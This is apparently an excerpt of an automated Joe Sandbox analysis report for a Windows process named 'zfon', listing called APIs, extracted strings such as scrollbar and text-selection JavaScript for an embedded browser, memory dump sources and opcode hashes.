                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970928F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970929F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092AF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                • Instruction ID: 1fda38239280ca6e0c49543cd9b73ac405fabfc23eb2fdb814b7073e3658e6af
                                                                                                • Opcode Fuzzy Hash: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                • Instruction Fuzzy Hash: 4EF0F4A0E0860765EB8CBF95AC4C268B1629F0D7F2F904A35C23D019EC8E5C249641B1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@$cef_string_map_alloc
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1597692744-3788999226
                                                                                                • Opcode ID: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                • Instruction ID: 4b5a1369870e7a3f92a2e1e0c552c1ca1bcd0dd547664205a02902215fd10708
                                                                                                • Opcode Fuzzy Hash: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                • Instruction Fuzzy Hash: 85D17B62B04B8585EF14EF65C8902ACA3B2EF94B98788C532CF1E177A8DF39D545C394
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB5488B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort
                                                                                                • String ID: $csm$csm
                                                                                                • API String ID: 4206212132-1512788406
                                                                                                • Opcode ID: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                • Instruction ID: 73989429bf1ab5b009e9834cbee2e3c25919ce398797fafda79e7c689d736f25
                                                                                                • Opcode Fuzzy Hash: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                • Instruction Fuzzy Hash: 1471BE32908681CADB698FA9D4B177DBBA0FB41BC8F088135DB8D07A89CB3CE451C740
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB545DB
                                                                                                • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BFB545EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 4108983575-3733052814
                                                                                                • Opcode ID: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                • Instruction ID: 649264b81e9e86f7715395e935e5787e92d04e273c4496495c120781862dd5d1
                                                                                                • Opcode Fuzzy Hash: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                • Instruction Fuzzy Hash: 67518D72908282C6EB688FA9A57536977A0FB54BD8F144136DB8D47B95CF3CF4A1CB00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 444109036-1018135373
                                                                                                • Opcode ID: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                • Instruction ID: 24b0a8b521ffcb295438d4cb54921eb551aa70d80cd25e0b804ead7f76c49737
                                                                                                • Opcode Fuzzy Hash: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                • Instruction Fuzzy Hash: 07513B7A61878197E634AB59E44226D77E4FB89BD8F106134EB8D07B95CF3CE461CB00
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F14
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F52
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F5C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: ios_base::failbit set
                                                                                                • API String ID: 2665656946-3924258884
                                                                                                • Opcode ID: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                • Instruction ID: 77d569f3df32e7e1cf953a4af9b9f11e352ddc2f645d269b08b37ff13017a50a
                                                                                                • Opcode Fuzzy Hash: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                • Instruction Fuzzy Hash: B631BF22B09BC191EE14DF2E964426C73A6EB05BE0F584631DB7E07BD6EE7CE0528304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::
                                                                                                • String ID: %lf
                                                                                                • API String ID: 1333004437-2891890143
                                                                                                • Opcode ID: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                • Instruction ID: d04e194e0ce013320e9b51e27e178798a32c873c339750474385b2399ca8ac07
                                                                                                • Opcode Fuzzy Hash: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                • Instruction Fuzzy Hash: AB31C561A08B8695EA10DFAAA8601BAB760FF56BC0F548236EB8E57755DF3CF101C740
                                                                                                APIs
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DA0
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DB2
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5E3B
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale$freemallocmemcpy
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1663771476-1405518554
                                                                                                • Opcode ID: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                • Instruction ID: 8f8d7b2db11f1d17ddf068099a507eff39654d807f91d19a04408d93e5681451
                                                                                                • Opcode Fuzzy Hash: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                • Instruction Fuzzy Hash: F731D622F1D6C296FE659F1EA4441BAA7A19F84BC0F488035DB4E47B55DE3CE9828340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: ContentSizeUpdate$scene
                                                                                                • API String ID: 3041573648-1460969042
                                                                                                • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                • Instruction ID: ac1445f280971c06f4215329918e307ade72c0bd7281e1852ac72f681cdfe69f
                                                                                                • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                • Instruction Fuzzy Hash: D4319F62609A8581EB20EF18E880269E7B1FFC5BD4F949131E6AD47AE9EF2CC445C750
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$strcmp
                                                                                                • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                • API String ID: 62325521-612978255
                                                                                                • Opcode ID: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                • Instruction ID: 9137e3c9df34cfa0472d8d1d6ca6e95796072c8461c1e11d7214cd86588feca2
                                                                                                • Opcode Fuzzy Hash: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                • Instruction Fuzzy Hash: 73316D62B09B81C2DB54DF16D850169A3B0FF88FC5B888036DE9D477A8DF38D555C3A0
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96FED30: cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEDF0
                                                                                                  • Part of subcall function 00007FF7F96FED30: cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEE28
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FECD0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FED08
                                                                                                Strings
                                                                                                • scene/custom-scrollbars, xrefs: 00007FF7F96FEC31
                                                                                                • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF7F96FEC1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                • API String ID: 2776152272-265620315
                                                                                                • Opcode ID: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                • Instruction ID: 86035ccc268e78a0a5e7e9b09c91db7383d0aa1de657f06673c0e9b494b2d9a8
                                                                                                • Opcode Fuzzy Hash: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                • Instruction Fuzzy Hash: 9D31AF22A09B8291EB11EF14E880369A771FBC4798F944131E6AD03AF9EF3CD445CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEDF0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEE28
                                                                                                Strings
                                                                                                • scene/disable-select, xrefs: 00007FF7F96FED51
                                                                                                • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF7F96FED3F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                • API String ID: 3856544966-2350028965
                                                                                                • Opcode ID: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                • Instruction ID: a1bfc1bd2e78424fe77b197ffbb79d8fbd07ffa43d6a790d4db081621bb16a9e
                                                                                                • Opcode Fuzzy Hash: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                • Instruction Fuzzy Hash: 34319422609B8691EB11EF14E850369A7B1FBC5798F944135E6AD436F8EF3CC445C760
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindNext$wcscpy_s
                                                                                                • String ID: .
                                                                                                • API String ID: 544952861-248832578
                                                                                                • Opcode ID: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                • Instruction ID: 56615fc15555a61d4ec349f0cffc447c4f9b76f370d8314c9a9436c579a671c6
                                                                                                • Opcode Fuzzy Hash: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                • Instruction Fuzzy Hash: 3C219366A0C6C1D1EFB09F19E8543B963A0EB487D0F448131DB8D47684DFBCE546D740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
